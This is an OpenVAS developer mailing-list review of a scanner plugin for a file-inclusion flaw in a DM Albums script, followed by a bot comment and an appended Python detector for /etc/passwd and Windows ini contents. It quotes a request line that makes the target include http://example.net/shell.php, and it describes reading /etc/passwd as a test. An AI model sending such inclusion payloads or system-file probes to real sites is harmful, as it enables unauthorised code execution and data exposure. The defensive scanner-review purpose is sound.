Hi,

I really don't think that plugins should be running with references
to injection code that is hosted on an uncontrolled 3rd party site.
That allows for introducing untrusted code into the scanner.

I may be wrong in terms of how the vulnerable album.php operates,
but if it truly does do an include, this is not the way to test it.
Instead, on *IX systems, the typical mode of operation is to
include a file such as /etc/passwd and grep for 'root' (see
Yap_Blog_remote-file_include.nasl for an example), or check
phpWebThings_35313.nasl for an example on how to check for
a vulnerability on either *IX or MS.

Thomas


>    trunk/openvas-plugins/scripts/gb_dm_filemanager_file_inc_vuln.nasl

> +  sndReq = http_get(item:dmfVer[2] + "/dm-albums/template/album.php?" +
> +                    "SECURITY_FILE=http://example.net/shell.php";, 
> port:dmfPort);
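
Review bot: the `SECURITY_FILE=` value in this `http_get` request is a URL on an outside host (`http://example.net/shell.php`), so the outcome of the check depends on content the plugin author does not control, and that content is what the target is asked to include during a scan. Point the parameter at a file that already exists on the target, such as /etc/passwd, and match the response for its contents, the approach the message attributes to Yap_Blog_remote-file_include.nasl and phpWebThings_35313.nasl.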


_______________________________________________
Openvas-devel mailing list
Openvas-devel@wald.intevation.org
http://lists.wald.intevation.org/mailman/listinfo/openvas-devel
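
The response-side check described in the message (look for /etc/passwd content on *IX, or an equivalent file on MS), as an added example that is not from the thread or from the OpenVAS plugins. It is written in Python rather than NASL so that it runs stand-alone; the Windows marker files, the function names and all sample response bodies are assumptions constructed for illustration.

```python
import re

# A passwd entry for uid 0 has the layout name:pw:0:gid:... Matching the field
# layout instead of the bare word 'root' avoids flagging error pages or prose
# that merely mention root.
PASSWD_ROOT = re.compile(r"\broot:[^:\s]*:0:[0-9]+:")

# Section headers from boot.ini / win.ini (assumed choice of Windows files).
WINDOWS_MARKERS = re.compile(
    r"^\[(boot loader|fonts|extensions)\]\s*$", re.MULTILINE | re.IGNORECASE
)


def local_file_evidence(body):
    """Return 'unix', 'windows' or None for one HTTP response body."""
    if PASSWD_ROOT.search(body):
        return "unix"
    if WINDOWS_MARKERS.search(body):
        return "windows"
    return None


def assess(responses):
    """Map each named response body to the evidence found in it."""
    return {name: local_file_evidence(body) for name, body in responses.items()}


# Constructed sample bodies, not captured from any real host.
SAMPLES = {
    "unix_hit": "<pre>root:x:0:0:root:/root:/bin/bash\n"
                "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n</pre>",
    "windows_hit": "; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n",
    # The include failed; the page mentions the path and the word 'root'.
    "error_page": "Warning: include(/etc/passwd): failed to open stream. "
                  "Contact the root administrator.",
    "patched": "<html><body>Album not found</body></html>",
}

if __name__ == "__main__":
    for name, verdict in assess(SAMPLES).items():
        print(f"{name}: {verdict}")
```

A plain substring match on 'root' would report the `error_page` sample as vulnerable; the field-layout pattern does not.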
